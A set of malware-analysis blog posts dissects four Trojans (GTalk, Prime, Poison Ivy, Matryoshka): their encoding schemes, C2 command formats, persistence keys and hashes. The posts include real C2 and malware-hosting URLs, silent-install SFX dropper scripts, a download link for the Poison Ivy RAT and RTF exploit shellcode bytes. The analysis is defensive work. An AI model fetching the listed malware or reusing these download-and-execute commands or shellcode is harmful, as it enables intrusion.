00401B8B                             PUSH 10000                 UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"

Trojan.GTalk

Today I am going to write about an interesting Trojan, whose concept (controlling malware via instant messaging) has been used for some time.  However Christmas came early this year and during one of our recent engagements we came across the C2 portion of this Trojan (screen shots are located at the end of this article).

 

The Trojan itself utilizes gloox, which is a free and publicly available jabber/XMPP client.  Jabber if you are unaware is an open standard for instant messaging, which is employed by the instant messaging portion of Google Talk.  This sample will connect to Google Talk with hard coded credentials.  The C2 portion of this Trojan family will also connect to Google Talk using credentials provided at run time via the GUI.  Once the two components have successfully authenticated with Google Talk all of the communication between the components and the Google Servers will be encrypted by means of TLS and SASL.  The C2 portion can then gather system information, run the pslist and pskill command, upload and download files, issue sleep commands, and obtain a reverse shell.

 

The Trojan and the C2 have an additional layer of encoding, which to me was the interesting part of both of these samples.  The hard coded credentials, the commands and responses for this sample are all encoded/decoded in the same manner.  So that this article doesn’t go from technical to soul crushingly boring only a high level explanation of the encoding/decoding will be provided below.  The actual credentials are not provided in this document, however similar data was used as examples.

 

Trojan.GTalk Analysis

 

File Name:  Trojan.GTalk.exe
File Size:  353792 bytes
MD5:        8845cb5b4e450cb10a3b6ca41a9b4319
SHA1:       bd224865730ff72d960a8ea49be315fdc615edb3
PE Time:    0x4E4A32CF [Tue Aug 16 09:05:19 2011 UTC]
PEID Sig:   Microsoft Visual C++ 8
Sections (5):
Name      Entropy  MD5
.text     6.58     bfb2e60a800996224698f5a81b80e8d1
.rdata    4.95     dbd4ac5000eda9e6e9124d72858d29b7
.data     4.46     54c204495e80764a21da3decd330cbb3
.rsrc     4.51     ffb05bcee52f5e69168029d4ffa5ccf1
.reloc    4.35     e6cfc56984a9068e2e5d3ca27cf67919

 AV: 2/43 (4.7%) [VIRUS TOTAL]

 

It should be noted that the hash values above do not match the hash values listed in Virus Total.  The log on credentials were removed from the sample that was submitted to Virus Total.  The hash values above are the correct hashes for the sample with the encoded credentials still in place.  

 

• This sample does not entrench itself on the compromised system.  Most likely the Trojan is entrenched on the compromised system either manually or by a dropper/installer file.

 

Decoding Credentials

This sample will take care of some basic housekeeping before it begins to decode the credentials that will be used to authenticate to the Google Talk servers.  The credentials can be located in the file at offset 0x42d84.  An example of the log on credentials (username in blue and password in red) can be seen below and are both null terminated strings.

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
00042D80   00 00 00 00 2B 34 71 4B  69 51 64 35 4D 2B 6F 4F       +4qKiQd5M+oO
00042D90   70 66 4E 62 6A 37 75 2F  75 71 6A 61 4D 78 73 57   pfNbj7u/uqjaMxsW
00042DA0   31 50 58 37 46 6D 75 39  4E 4C 6D 7A 5A 48 4E 58   1PX7Fmu9NLmzZHNX
00042DB0   62 66 63 3D 00 00 00 00  00 00 00 00 00 00 00 00   bfc=
00042DC0   00 00 00 00 2B 34 71 4B  49 56 6F 50 2B 56 54 6A       +4qKIVoP+VTj
00042DD0   71 4C 79 4B 78 44 39 41  2F 67 65 39 38 4F 6F 2F   qLyKxD9A/ge98Oo/
00042DE0   63 48 47 4B 69 67 3D 3D  00 00 00 00 00 00 00 00   cHGKig==

 

• This sample will Base64 decode the first string using a custom alphabet mapping.  An example of the first string, in its decoded form, can be seen below.

 

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
00000000   FB 8A 8A 8A A6 F9 33 E3  A8 A5 F3 5B 8F BB BF B9   ûŠŠŠ¦ù3㨥ó[ »¿¹
00000010   A8 EA 33 1B 16 D4 F5 F7  16 6B B4 34 B9 B3 C4 73   ¨ê3  Ôõù k¹4¹³ds
00000020   57 6D F7                                           Wm÷

 

• This sample will then use a hard coded table that is located at offset 0x4e208 to further decode the above string.  This step is just a large substitution cipher.   The table located at the referenced offset is concealed in a larger portion of code, which is not used by the Trojan.  The table (0x100 bytes in length and in black) can be seen below.

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
0004E1E0   54 60 3C 50 1F 20 97 A8  37 04 21 FF 06 17 DC AF   T`<P  —¨7 !ÿ  ܯ
0004E1F0   A9 09 42 D1 B5 8B 3B 2D  AC 47 8C 86 3D 29 B8 84   © Bѵ‹;-¬GŒ†=)¸„
0004E200   10 7B 96 A6 1B E8 33 F3  41 9C 83 34 E1 D1 E4 B0    {–¦ è3óAœƒ4áÑä°
0004E210   1C E9 3C 70 80 0E 4A 93  F8 2A 06 B4 4C 55 7C E5    é<p€ J“ø* ´LU|å
0004E220   53 2D 5B FC 49 79 67 DC  DD E2 38 44 A2 66 6F 5A   S-[üIygÜÝâ8D¢foZ
0004E230   A9 F5 A0 62 AC EF 57 73  C8 A6 BE FE CD 97 4D E0   ©õ b¬ïWsȦ¾þÍ—Mà
0004E240   78 14 48 EE DA F4 0D 1F  8F D6 EA AF D0 25 74 F1   x HîÚô  Öê¯Ð%tñ
0004E250   28 4E 86 2E 15 9D C2 BB  DB 98 76 99 D8 27 3F CA   (N†. Â»Û˜v™Ø'?Ê
0004E260   A7 4F 47 03 8D A3 A8 46  D9 0B 58 9A D5 8A 18 22   §OG £¨FÙ XšÕŠ "
0004E270   1A CE 37 CB AA B6 6B C0  8C 95 91 8B 68 CC D2 B1    Î7˪¶kÀŒ•‘‹hÌÒ±
0004E280   59 2B 4B F9 87 89 BF 12  0A 7A 77 7B F7 52 F3 61   Y+Kù‡‰¿  zw{÷Róa
0004E290   B7 29 00 ED F2 96 69 13  63 45 17 5D 51 C4 FA DE   ·) íò–i cE ]QÄúÞ
0004E2A0   7D 35 88 84 56 C1 B2 82  90 6D B9 AB A5 D7 FB BC   }5ˆ„VÁ²‚m¹«¥×û¼
0004E2B0   DF E8 43 11 F0 32 9B E7  64 C7 33 AD 30 EC 24 31   ßèC ð2›çdÇ3­0ì$1
0004E2C0   F6 7F 6E 07 C6 36 BA 75  C3 08 23 AE 50 0C BD 81   ön Æ6ºuà #®P ½
0004E2D0   1B 0F 8E 3E 42 9F 5F 71  1E EB A1 21 40 2C 02 C5     Ž>BŸ_q ë¡!@, Å
0004E2E0   B8 72 3A 3D E6 19 CF 65  92 20 10 9E 6C 54 39 01   ¸r:=æ Ïe’  žlT9
0004E2F0   FD 04 85 B5 05 5C C9 94  D4 6A 09 FF B3 2F 16 60   ý …µ \É”Ôj ÿ³/ `
0004E300   3B 7E 26 1D D3 A4 5E E3                            ;~& Ó¤^ã

 

• An example of how the substitution cipher works is as follows.  The Trojan will use the first byte of the string (0xFB or decimal 251) and take the value located in that position and replace the original value of the string.  This will occur for each byte of the string.

 

Position

D0

D1

D2

D3

D4

D5

D6

D7

D8

D9

DA

DB

DC

DD

DE

DF

Value

92

20

10

9E

6C

54

39

01

FD

04

85

B5

05

5C

C9

94

Position

F0

F1

F2

F3

F4

F5

F6

F7

F8

F9

FA

FB

FC

FD

FE

FF

Value

D4

6A

09

FF

B3

2F

16

60

3B

7E

26

1D

D3

A4

5E

E3

 

Original String:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
00000000   FB 8A 8A 8A A6 F9 33 E3  A8 A5 F3 5B 8F BB BF B9   ûŠŠŠ¦ù3㨥ó[ »¿¹
00000010   A8 EA 33 1B 16 D4 F5 F7  16 6B B4 34 B9 B3 C4 73   ¨ê3  Ôõù k¹4¹³ds
00000020   57 6D F7                                           Wm÷

 

Decoded String:

00000000   1D 00 00 00 FB 5E FE 9E AF D7 FF 33 13 07 75 7F  ...û~þžß3×ÿ
00000010   DF 82 FE FC 7D 40 2F 7E 7C CB 7F 32 7F AD D5 8B  ß…þü|@/~|Ë2Í­Õ‹
00000020   CA B6 60

 

The next part of the decoding scheme is explained, for brevity, at a very high level.  From my research I could not determine that this is a standard or well-known algorithm.  Fully explaining how this algorithm works could be a blog unto itself.  In the future, if time allows, I will write an article covering all the details of how this algorithm works and how to decode/encode data using the algorithm.  The algorithm creates a 4,392 byte table of values.  During the decoding process the position of values (specifically the ones used to decode) are exchanged with other values in the table, adding another layer of protection.

 

• The first Dword of the decoded string is the length of the final decoded string after the next stage of decoding.

 

• The final stage involves an algorithm that encodes and decodes data on the bit level.  This bit stream encoding comprises a series of instructions which breaks each byte down into its binary equivalent (0xFB would be 1111 1011)  .  Each one of these binary values are treated as an integer and added to a hard coded starting value.  The sum of the two pieces will act as an offset into the previously referenced 4,392 byte table.  This table is created in memory at run time, from another set of instructions.

 

• The offset into the table will point to a word value, which will be added to the next integer representation of the binary data.  This technique continues until the sum of the word value and the binary value exceeds the hard coded value 0×273.  Once this criteria has been met the algorithm branches into another set of instructions.  These instructions will perform some simple math to determine a pointer into the table.  The value at this pointer is the decoded value, which will be written into memory.  The algorithm then branches into another set of instructions that scrambles and alters (by means of addition) values in  the 4,392 byte table, by exchanging several word values that were used to decode the previous byte of data. The algorithm will then continue with the steps outlined above until it reaches another value above 0×273.

 

• The result is the decoded string.  The Trojan will then complete the sames steps to decode the password used to authenticate with the Google Talk servers.

 

Trojan Communication

 

The Trojan communication portion of this sample involves authenticating to Google Talk servers.  This is accomplished with the credentials that were decoded above.  Once an attacker has authenticated to the Google Talk Servers (via the GUI C2 node), the two pieces can begin communicating.  The C2 node will issue commands,  which are transmitted as integer values.  These values are encoded in the steps above reversed (bit stream encoded, substitution cipher, and then Base64 encoded) and transmitted to the Trojan, via a secured conduit provided unwittingly by Google .  The Trojan will decode the message it receives and send a response to the C2 in the same manner.  If the C2 node establishes a reverse shell or uploads/downloads files, that data will also be encoded in the same manner.

 

Once you get past the encoding/decoding portion of this sample everything else, including the commands, are straight forward and have been seen before in previously analyzed samples.  Below is a screen shot of how this sample determines the commands sent.

 

 

 

I have included screen shots relating to the functionality of the GUI C2 portion of this family.

 

Initial Screen

 

 

Log On Prompt

I provided a set of credentials that I created for the analysis of this sample.

 

 

Logged On, showing available compromised machine and embedded username

The sample that was analyzed was patched with another set of credentials that I created for the analysis of this sample.  The two google accounts were paired or connected prior to the analysis.

 

 

Initial Command Screen for available compromised machine

 

 

Info Command

 

 

Pslist Command

 

 

Pskill Command

 

 

Uploading a file to the compromised machine

 

 

Downloading a file from the compromised machine

 

 

Reverse shell to the compromised machine

Trojan.Prime

 

 

 

Today I am going to write about an interesting Trojan that our company came across.  The dropper/installer file for this sample is a self extracting executable (with a Windows folder icon), which is old news.  The sample itself though it pretty interesting.  The sample works, in principle, the same way that many previous Trojans have worked, in that it request a webpage that contains encoded instructions.  However the encoding of these embedded instructions is where this sample differs from all the previous variations that I have analyzed. The initial beacon location and the sleep instructions are decoded by a set of functions, that utilizes prime numbers to perform the mathematical operations.  I believe that these functions could be loosely based off of the Chinese Remainder Theorem and the Prime Factor Algorithm (PFA).  The result of these functions are a look-up into 67 byte array.  If executable files are downloaded they  are decoded using Base64 (with a custom alphabet mapping) and then RC4 decrypted.

 

Carrier File

File Name:  G20_Agenda.exe
File Size:  170568 bytes
MD5:        9a99b2132c986d54d2d2f32fe98bec4a
SHA1:       b289251a4329b214584e4d545989121b20837396
PE Time:    0x4A87E7FF [Sun Aug 16 11:05:35 2009 UTC]
Sections (5):
Name      Entropy  MD5
.text     6.56     5c4d5ace2672731f58b9d31b4d21f13f
.rdata    5.51     019ad0f666e2ac17292e5d20e1bdf6c3
.data     3.54     2821477811bfd11f4acd2c1da2aba6da
.CRT      0.21     324bcdad78da9eab2e1651550291e550
.rsrc     5.19     a8374e7be9f96f35cd94b8eab9634363

 

 AV: 16/43 (37.2%) [VIRUS TOTAL]

 

 

 

 

 

The above file (which was an attachment in an email) is another example of a recent spear phishing attack.  This file is a self-extracting executable file, which has a folder icon (which can be seen above).

 

 

The file contains the following Comment:

;下面的注释包含自解压脚本命令

Path=%temp%
SavePath
Setup=%temp%\AcroRD32.exe
Silent=1
Overwrite=2

The above Chinese characters translate to “The following comment contains SFX script command”

 

The above script commands will silently create the file AcroRD32.exe in the current user’s Temp folder and then execute the file.  The information for AcroRD32.exe is listed below:

 

Trojan.Prime Analysis

 

File Name:  AcroRD32.exe
File Size:  13312 bytes
MD5:        ec7b846da25c2a5e64f1567db4baf2b4
SHA1:       fba311145f8d6100600af120f1ae40906be87f41
PE Time:    0x4EA61CC7 [Tue Oct 25 02:19:51 2011 UTC]
Sections (2):
Name      Entropy  MD5
.data     6.39     5bcebd125fc43584937ad9952c86adb5
.rsrc     0.59     6c276ff345d2208932e7a396abd69379

 

 AV: 15/43 (34.9%) [VIRUS TOTAL]

 

The AcroRD32.exe file will first entrench itself on the compromised system in the following registry location:

 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AcroRD32.exe.

• The path will to the Trojan located in the user’s Temp folder.

 

 

The sample will then locate the following string (null terminated in red below), which is located at offset 0×614.

 

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000610               36 6B 36 47  70 6D 73 74 61 62 46 45       6k6GpmstabFE
00000620   58 5C 6E 47 74 7A 38 37  30 6E 76 48 6C 6B 74 70   X\nGtz870nvHlktp
00000630   79 54 47 6D 2F 5F 72 2F  38 63 76 5F 34 63 64 00   yTGm/_r/8cv_4cd
00000640   53 6F 66 74 77 61 72 65  5C 4D 69 63 72 6F 73 6F   Software\Microso

 

The malware will then decode the above string using a series of instructions which involves different mathematical functions which all use Prime numbers.  The result of which will be a look up position into the string (created at runtime), which is displayed below:

 

abcdefghijklmnopqrstuvwxyz./0123456789:\_ABCDEFGHIJKLMNOPQRSTUVWXYZ

 

The hard coded string located at file offset 0×614 will be decoded as the following.

 

http://admin.datastorage01.org/newsinfo.htm

 

The malware will then request that file.  A portion of this file’s data can be seen below:

 

<div safe: KHAikuzeGfw*RoRCtChV:30f9*_wfHUdge\dR0EF balance>
<HTML>
<HEAD>
<META http-equiv="content-type" content="text/html;charset=ISO-8859-1">
<META http-equiv="Content-Style-Type" content="text/css">
<TITLE></TITLE>
<LINK rel="stylesheet" type="text/css" href="hf_style.css">
</HEAD>

 

The portion in red (above) resembles other Trojans that use HTML comments to send commands.  In theory, this one operates in the same way, except instead of Base64 encoding another form of encoding is used.

 Instruction Decoding

The malware will then parse the HTML code for <div safe:[space] and [space]balance>.  The malware will then decode the data located between these two place holders (that data is highlighted in red above).

 

The malware decodes these instructions using a series of instructions which involves different mathematical functions which all use Prime numbers (which was described above).   The decoded data is displayed below:

 

Dehttp://admin.datastorage01.org/htm.htm

 

Below is a screen shot of how the sample compares the decoded commands:

 

 

The Trojan will then compare the first character of the decoded string with the character J (0x4A).  If the first character of the string is J, then the sample will skip the first dword of the string and compare the fifth character with the values 0, 1, and 2 (0×30, 0×31, and 0×32 respectively).

 

• If the value is 0 (0×30)the sample will take the remaining characters in the string (until null terminated) and covert that ASCII string to a hexadecimal integer.  That integer will then be multiplied with the value 0x36EE80 (3600000 decimal).  The product of this is then used as the amount of time (in milliseconds) for the sample to sleep.  The value 0x36EE80 is equivalent to 1 hour.  So if the decoded string is Jxxx02, this will instruct the sample to sleep for two hours.

 

• If the value is 1 (0×31) the sample will take the remaining characters in the string (until null terminated) and convert that ASCII string to a hexadecimal integer.  That integer will then be multiplied with the value 0x0EA60 (60000 decimal).  The product of this is then used as the amount of time (in milliseconds) for the sample to sleep.  The value 0x0EA60 is equivalent to 1 minute.  So if the decoded string is Jxxx12, this will instruct the sample to sleep for two minutes.

 

• If the value is 2 (0×32) the sample will take the remaining characters in the string (until null terminated) and convert that ASCII string to a hexadecimal integer.  That integer will then be multiplied with the value 0x5265C00 (86400000 decimal).  The product of this is then used as the amount of time (in milliseconds) for the sample to sleep.  The value 0x5265C00 is equivalent to 1 day (24 hours).  So if the decoded string is Jxxx22, this will instruct the sample to sleep for two days (48 hours).

 

If the first character of the decoded string is not J (0x4A), then the sample will check to see if the first character is D (0×44).  If the first character is D (0×44) the sample will check to see if the next character is o or e (0x6F or 0×65).

 

• If the first two characters of the decoded string are Do (0x446F), the sample will determine the current user’s temp path (ex. C:\Documents and Settings\couyon\Local Settings\Temp\) and then create a file in that location.

• The file’s name will begin with the prefix win.  The sample uses that prefix and an API call to GetTempFileName (the details of this call can be read at this location – http://msdn.microsoft.com/en-us/library/windows/desktop/aa364991%28v=vs.85%29.aspx) to create a unique file name (ex. win3.tmp or win14.tmp).  The sample then replaces the .tmp file extension with the .exe file extension (ex. win3.exe).

• This sample will then take the remaining characters in the string (until null terminated) to use as the URL location to download another malicious file (ex. Dohttp://www.bad.com/malware.htm).  The sample uses an API call to URLDownloadToFile to then download the malicious file to the newly created file in the current user’s Temp directory.

 

Once the file is downloaded the sample will sleep for 11 minutes and then again request the file http://admin.datastorage01.org/newsinfo.htm to receive further commands.

 

If the first two characters of the decoded string are De (0×4465), the sample will determine the current user’s temp path and then create a file in that location.

• Like the previous command the file’s name will begin with the prefix win.  The sample uses that prefix and an API call to GetTempFileName to create a unique file name (ex. win7.tmp or win14.tmp).  The sample then replaces the .tmp file extension with the .exe file extension (ex. win7.exe).

• Next the sample will create another file with the GetTempFileName call.  This file will also be created in the user’s Temp folder and it will have the prefix tmp (ex. tmp3.tmp or tmp14.tmp).

• Thesample will then take the remaining characters in the string (until null terminated) to use as the URL location to download another malicious file (ex. Dehttp://www.bad.com/malware.htm).  The sample uses an API call to URLDownloadToFile to then download the malicious file to the newly created .tmp file in the current user’s Temp directory.  After the file has been downloaded the sample will read the .tmp file’s contents into memory.

 

The sample will then parse the file’s data for <div[space] a= and [space]q> </div>.  The malware will then copy the data located between these two place holders (that data is highlighted in red below) into a new area of memory.

 

<div a=-x0efRnWAJ4fy9rSjGS...[removed for brevity]…9CYJ q></div>

 

Executable File Decoding

 

The sample will then Base64 decode the parsed data, using a custom alphabet mapping.  In this sample the custom alphabet (which can be seen below) can be located at file offset 0x6A0.

 

o2B1Ix8+D65E9e7GYynqNwChljWUmsVadzZX4H3-MOTApFJKf0cvtrQgkLRbuSPi

 

 

This is where things get a little bizarre.  First I will describe how I think the sample was intended to work, and then I will explain how the sample actually works.

 

The sample takes the string 3DC76854-C328-43D7-9E07-24BF894F8EF5 (including the dashes), which is located at file offset 0×534 of the file, and creates a MD5 hash value for that string.

 

When the sample creates the hash value it is stored as hexadecimal values.  The malware will convert those values to the ASCII string D495007A5C7EFC92ECBCDF85720595E7.  My assumption is that the malware author intended to use this ASCII string as a RC4 key to decrypt the data that had been Base64 decoded previously.

 

When I first analyzed this sample I recognized the code that would be responsible for the RC4 decryption and skipped over it, because the sample decrypted the decoded data into an executable file.  It was only when I was writing a script to encode/decode the data that the sample received that I realized something was not quite right.

• Before I go any further here is a quick side note on how a portion of the RC4 algorithm works.  A table is built from the values 0×00 – 0xFF (this would be 256 bytes in length).  Next a table is built from the RC4 key, the variable length key is repeated until the table also reaches a size of 256 bytes.  The RC4 algorithm then scrambles the initial table based off of the second table.  As far as the RC4 algorithm goes, that is all you need to know for what I am about to explain.

 

After a closer look at the code there was either a mistake or a deliberate decision on the part of the malware author relating to how the RC4 key table was constructed.

In the below screen shot of the code you can see where the code is moving 1 to EAX.  Because of this instruction the table that is created is a table not where the 16 byte key is repeated but a table where the first value of the key is put into place and then the second byte of the key is repeated 255 more times.  This results in what is basically a 256 byte key which can be seen below the screen shot.

 

 

• Table created from the above instructions

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
00000000   44 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   D444444444444444
00000010   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
00000020   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
00000030   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
00000040   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
00000050   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
00000060   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
00000070   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
00000080   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
00000090   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
000000A0   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
000000B0   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
000000C0   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
000000D0   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
000000E0   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444
000000F0   34 34 34 34 34 34 34 34  34 34 34 34 34 34 34 34   4444444444444444

 

 

 

Once I made these corrections to the script the data would decrypt correctly.  So whether this was an accident by the author or a deliberate attempt to slow down analyst is hard to say.  Regardless the information decrypted correctly which means that the data was encrypted with the same key.

 

After the data is decrypted, the data will be written to the file win##.exe file that was created in the current user’s Temp folder, and then the sample deletes the .tmp file that contained the downloaded data.  The newly created file will then be executed as a child process of AcroRD32.exe.  The sample will then enter a 23 minute sleep before it again request the file http://admin.datastorage01.org/newsinfo.htm to receive further commands.

 

As of this writing the http://admin.datastorage01.org/newsinfo.htm file will instruct this sample to download the file http://admin.datastorage01.org/htm.htm, decrypt it and then execute that malicious file on the compromised system.  That particular piece of malware will not be covered in this blog, however I have included the information for the file.

 

File Name:  morebadness.exe
File Size:  24577 bytes
MD5:        7f0f246cb10e9a9d54a22b82a4d1d2f9
SHA1:       12ac423ba571af9cb2a894c5366a159c2ee26ea1
PE Time:    0x4D9ED10D [Fri Apr 08 09:10:37 2011 UTC]
Sections (3):
Name      Entropy  MD5
.text     6.31     51a5eb1e68b35f1e93dcbe82563409ce
.rdata    5.01     d4ec74de29419832b0295db629166394
.data     3.97     d16d1a3a1f74707f2bc73277a364f7a0

 

 AV: 3/43 (7.0%) [VIRUS TOTAL]

 

 

Poison Ivy

 

Today I am going to look at a Trojan called Poison Ivy, which is old news for those of you who have worked in this field.  However because of its efficiency this Trojan continues to be used time and time again in attacks.  This specific sample was used in a campaign to attack a defense contractor during the past week.  Because of the attention this Trojan has already received this post will be short and to the point.  This sample was downloaded from www.denron.com.sg  And as of this writing the file was still being hosted from the following URL: (WARNING!!! – This is Malware)  http://www.denron.com.sg/download/antivirus.exe

 

File Name:  antivirus.exe
File Size:  133007 bytes
MD5:        22f77c113cc6d43d8c12ed3c9fb39825
SHA1:       dd639a7f682e985406256468d6df8a717e77b7f3
PE Time:    0x4DE11D0D [Sat May 28 16:04:29 2011 UTC]
Sections (5):
Name      Entropy  MD5
.text     6.56     984dfeff737935f78877d3d08b82ef95
.rdata    4.86     0fb0a72395723950e1915d6bf373f506
.data     3.52     11ffdfc240c81dfe9d957f6bf1761f00
.CRT      0.21     a5ba361df79e0a565f00bd42dc501625
.rsrc     4.66     3d30a9ebb884b745221ffec31318c63c

 

The above file (antivirus.exe) is a self extracting zip file.  When the file is run the following commands are run.

 

;The comment below contains SFX script commands

Path=%temp%
SavePath
Setup=%temp%\sa.exe
Silent=1
Overwrite=1
Update=U

 

As you can see from the commands the executable will extract the payload to %temp%\sa.exe which will be the current user’s Temp folder and will overwrite the file if it is already present.

Once the file has been written to the Temp folder it will execute.  After this first step has been completed the real nefarious activity begins.

When executed this sample will create a copy of itself as an alternate data stream file to C:\WINDOWS\system32:mstseca.exe

The information for this file is below:

File Name:  mstseca.exe
File Size:  62464 bytes
MD5:        6f6d6a848f87fbf26f71549d73da61f4
SHA1:       a4bd1b8e669ff16a57100f9ed2424cc939035be1
PE Time:    0x4E92F4C3 [Mon Oct 10 13:36:03 2011 UTC]
PEID Sig:   Microsoft Visual C++ 8
Sections (5):
Name      Entropy  MD5
.text     6.56     430a9480e7a7b38b5ca1fc96c3dd382e
.rdata    5.47     19a2927085b92f40889ded6e04c9fbef
.data     2.13     0dcbda60f9ee59c65e411c371a116a97
.rsrc     5.11     81195ca9b22c050f79e44175e9e7150e
.reloc    3.84     9954379c94654d163731fc243744d9aa

AV: 1/43 (2.3%) [VIRUS TOTAL]

 

•   If you want to read more about Alternate Data Streams you can read this article http://www.symantec.com/connect/articles/windows-ntfs-alternate-data-streams.

The Trojan then entrenches itself in the registry as an ActiveX component under:

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{848AE119-0B97-0406-7256-DB0C98F3D762}}

StubPath: C:\WINDOWS\system32:mstseca.exe

 

The Trojan launches an instance of iexplore.exe and injects its code into it:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome

 

• This initial behavior is indicative of Poison Ivy.  Another tell-tale sign is that the Trojan beacons 256 bytes of information.

• This Trojan beacons to:

domain.rm6.org over TCP Port 80

Once a connection is established, it sends 256 bytes of data to the C2 node.
Poison Ivy is a very impressive trojan and it has been used for some time now.  In Virus Total only one AV vendor recognized this sample.

The password for this sample was left as the default (admin).

In order to determine the password you will need to dump the memory of process iexplore.exe or just attach to it with a debugger to access its memory.

Next run a search for the domain name (in this case domain.rm6.org).  On the first hit that you get, right above it you should see the password.

• Here is a screenshot from our sample:

Below are two screen shots that shows the victim connected to the client. The configuration settings are straight forward, but if you have any questions about them let me know.

 

 

 

The functionality of this tool is well documented throughout the internet and if interested you can download a copy of Poison Ivy from the following link (but only do so from a VM – http://www.poisonivy-rat.com/index.php?link=download).

Trojan. Matryoshka

 

 

 

Today I am going to look at two different pieces of malware and the carrier file that delivered it all.  The carrier file is pretty straightforward and as designed it will drop a malicious file. I am going to refer to this dropped file as Trojan. Matryoshka, because like nesting dolls it is a container or wrapper for another completely different malicious file which I will refer to as Trojan.Einstein.  Trojan.Matryoshka is really a simple file that only exists to launch another malicious file.  In this sample that second malicious file was Trojan.Einstein, however any other malicious file could be concealed by Trojan.Matryoshka.  Symantec has a write up on a variant of this file (Trojan.Taidoor), however the write up does not detail everything accurately.

 

The document below was sent as an attachment in a spear phishing email.  The file is actually a rich text format (RTF) file, which has embedded shellcode that will extract the payload and a decoy document.  This is an older vulnerability (CVE-2010-3333), that if you work in this field you have seen numerous times before, but I will briefly cover this part of the attack for those who have not seen this before.

 

File Name:  attachment.doc
File Size:  61455 bytes
MD5:        8406c1ae494add6e4f0e78b476fb4db0
SHA1:       2243ec5b327ac69afbc155fcb9db7d14592c8cba

AV: 20 /43 (46.5%) [Virus Total]

The contents of the attachment can be seen below.  Numerous bytes of 0×30 were removed for brevity.  To analyze the shell code you must first convert the code from ASCII hex (as seen below) to hexadecimal values.

 

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   7B 5C 72 74 66 31 7B 5C  73 68 70 7B 5C 2A 5C 73   {\rtf1{\shp{\*\s
00000010   68 70 69 6E 73 74 7B 5C  73 70 7B 5C 73 6E 20 70   hpinst{\sp{\sn p
00000020   46 72 61 67 6D 65 6E 74  73 7D 7B 5C 73 76 20 31   Fragments}{\sv 1
00000030   3B 31 30 30 30 30 30 30  30 30 30 30 30 30 30 30   ;100000000000000
00000040   30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000

…REMOVED FOR BREVITY…

00003C10   30 30 30 30 30 30 30 30  30 30 3B 30 31 32 33 34   0000000000;01234
00003C20   35 36 37 66 66 30 32 30  30 30 30 30 30 30 30 30   567ff02000000000
00003C30   30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000
00003C40   30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 63   000000000000000c
00003C50   65 32 34 66 61 37 66 30  30 30 30 38 30 37 63 30   e24fa7f0000807c0
00003C60   30 30 30 38 30 37 63 42  42 42 42 42 42 42 42 43   000807cBBBBBBBBC
00003C70   43 43 43 43 43 43 43 44  44 44 44 44 44 44 44 39   CCCCCCCDDDDDDDD9
00003C80   30 36 61 38 38 37 43 39  30 39 30 39 30 33 33 63   06a887C90909033c
00003C90   30 36 34 38 62 34 30 33  30 33 65 38 62 34 30 30   0648b40303e8b400
00003CA0   63 33 65 38 62 34 30 31  63 33 65 38 62 37 30 30   c3e8b401c3e8b700
00003CB0   38 33 65 38 62 37 38 32  30 33 65 38 62 30 30 36   83e8b78203e8b006
00003CC0   36 33 65 38 33 37 66 31  38 30 30 37 35 65 64 38   63e837f180075ed8
00003CD0   31 65 63 30 30 30 34 30  30 30 30 38 62 66 63 33   1ec000400008bfc3
00003CE0   65 63 37 30 37 38 35 64  66 61 66 62 62 33 65 63   ec70785dfafbb3ec
00003CF0   37 34 37 30 34 38 65 31  33 30 61 61 63 33 65 63   747048e130aac3ec
00003D00   37 34 37 30 38 35 61 64  34 32 34 39 34 33 65 63   747085ad424943ec

 

Once converted to hexadecimal values the code can be analyzed.  Below is the shell code responsible for locating and decoding the malicious payload.  Below the shell code screen shot is a portion of data that is located in this sample which will be decoded and an explanation of the screen shot .

 

 

 

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

000041C0   38 35 62 63 33 35 66 35  65 35 62 38 33 63 34 34   85bc35f5e5b83c44
000041D0   30 33 62 65 63 65 38 38  66 30 31 30 30 30 30 38   03bece88f0100008
000041E0   62 65 35 35 64 63 33 39  30 7D 7D 7D 7D 5C 61 64   be55dc390}}}}\ad
000041F0   65 66 6C 61 6E 67 31 30  32 35 58 58 58 58 59 59   eflang1025XXXXYY
00004200   59 59 48 5E 93 02 02 00  FF FE F9 FC FB FA 06 07   YYH^“   ÿþùüûú
00004210   F7 F6 4D F4 F3 F2 F1 F0  EF EE AD EC EB EA E9 E8   ÷öMôóòñðïî­ìëêéè
00004220   E7 E6 E5 E4 E3 E2 E1 E0  DF DE DD DC DB DA D9 D8   çæåäãâáàßÞÝÜÛÚÙØ
00004230   D7 D6 D5 D4 D3 D2 D1 D0  CF CE CD CC CB CA 11 C8   ×ÖÕÔÓÒÑÐÏÎÍÌËÊ È
